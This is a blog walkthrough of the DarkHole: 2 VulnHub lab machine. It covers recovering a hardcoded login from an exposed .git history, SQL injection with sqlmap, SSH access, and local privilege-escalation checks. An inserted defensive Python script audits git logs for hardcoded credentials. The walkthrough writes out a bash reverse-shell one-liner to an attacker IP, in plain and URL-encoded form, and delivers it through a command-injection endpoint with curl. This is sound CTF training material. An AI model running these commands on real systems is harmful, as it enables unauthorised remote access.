Vulnhub-DARKHOLE: 2
Description
- Name: DarkHole: 2
- Date release: 3 Sep 2021
- Author: Jehad Alqurashi
- Series: DarkHole

Difficulty: Hard
This works better with VMware rather than VirtualBox
Hint: Don’t waste your time For Brute-Force
Host discovery with nmap

kali 192.168.169.220
Scan the target with nmap

Ports: 22, 80
Directory enumeration


Use the git-dumper tool
https://github.com/arthaud/git-dumper

- Run git_dumper.py
python3 git_dumper.py http://192.168.169.230/.git/ website

Inspect the files


A login page that requires an email and password

git log

View the change history


Account credentials found
if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
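The credential above was recoverable only from the commit history. As an added example (not part of the original write-up), here is a defender-side audit that scans `git log -p` output for request fields compared directly to string literals. The sample log, its placeholder values and the function name are constructed for illustration.

```python
import re

# Request field compared directly to a quoted literal, e.g. $_POST['x'] == "y"
LITERAL_CMP = re.compile(r"""\$_(?:POST|GET|REQUEST)\[['"](\w+)['"]\]\s*===?\s*(['"]).+?\2""")

# Constructed `git log -p` output (placeholder values, not the target's repository).
SAMPLE_LOG = '''commit 2222222222222222222222222222222222222222
Author: dev <dev@example.test>

    use the database for login

diff --git a/login.php b/login.php
--- a/login.php
+++ b/login.php
@@ -1,3 +1,3 @@
 <?php
-if($_POST['email'] == "user@example.test" && $_POST['password'] == "changeme"){
+if(login($_POST['email'], $_POST['password'])){
     $_SESSION['userid'] = 1;
commit 1111111111111111111111111111111111111111
Author: dev <dev@example.test>

    add login page

diff --git a/login.php b/login.php
--- /dev/null
+++ b/login.php
@@ -0,0 +1,3 @@
+<?php
+if($_POST['email'] == "user@example.test" && $_POST['password'] == "changeme"){
+    $_SESSION['userid'] = 1;
'''


def find_hardcoded_credentials(log_text):
    """Return (commit, file, field, sign) for each added/removed line that
    compares request input to a string literal. The literal is not echoed."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:7]
        elif line.startswith(("--- a/", "+++ b/")):
            path = line[6:]
        elif line.startswith(("--- ", "+++ ")):
            continue  # /dev/null side of an added or deleted file
        elif line.startswith(("+", "-")):
            for m in LITERAL_CMP.finditer(line):
                findings.append((commit, path, m.group(1), line[0]))
    return findings
```

On a real repository, pass the output of `git log -p --all` to the function. A hit on a removed (`-`) line means the secret is gone from the working tree but still readable in history, so it should be rotated.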
Test the login


The URL shows an injection point
Injection
- The cookie must be included

sqlmap -u "http://192.168.169.230/dashboard.php?id=1" --cookie PHPSESSID=3ca3jbi4mk3749bv84uu4supol --dbs


- ssh
 

- users
 

ssh
ssh jehad@192.168.169.230


find / -user root -perm -4000 -print 2>/dev/null
- Check the scheduled tasks

cat /etc/crontab

Take a look at /opt/web:
cat /opt/web/index.php

- Check the TCP processes:

netstat -tlnp


Commands can be run via cmd
Write the shell
- Start a listener
- URL-encode the command

bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'
bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
- Write it

curl "127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'"


- Check the command history



Switch user


Privilege escalation



Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. When reposting, please credit Putdownd’s Blog!
